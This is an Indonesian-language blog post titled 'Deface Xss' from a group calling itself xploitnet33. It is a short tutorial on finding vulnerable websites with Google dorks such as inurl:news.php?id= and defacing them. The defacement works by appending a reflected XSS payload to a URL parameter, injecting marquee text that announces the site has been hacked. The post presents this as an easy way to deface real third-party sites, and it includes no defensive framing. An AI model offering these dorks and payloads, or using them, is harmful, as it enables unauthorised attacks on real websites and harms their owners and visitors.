Deface Xss

Deface Xss

assmualaikum gw bakal kasih Tutorial cara poc xss

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

Oke pertama kalian dorking di Google

Dork : inurl:"/showcatrows.php?CategoryID="
inurl:news.php?id=
maka muncul kek gini target.com/showcatrows.php?CategoryID=2"
jika sudah pilih web masukin sc xss kalen nih ambil target.com/showcatrows.php?CategoryID=2"showcatrows.php?><marquee><h1>Happy+Hacked_Day+Day+By+Hanz_Solo<%2Fh1><%2Fmarquee>
Selesai, Website sudah berhasil kita deface :D
ezz kan jangan lupa baca lagi yang lain
my team xploitnet33
Tampilkan Komentar
Sembunyikan Komentar

0 Response to "Deface Xss"

Post a Comment

Note: Only a member of this blog may post a comment.

Your Information

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel